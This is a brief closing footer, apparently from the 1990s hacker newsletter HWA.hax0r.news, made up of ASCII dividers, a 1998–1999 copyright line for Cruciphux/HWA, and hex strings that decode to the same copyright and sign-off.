--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]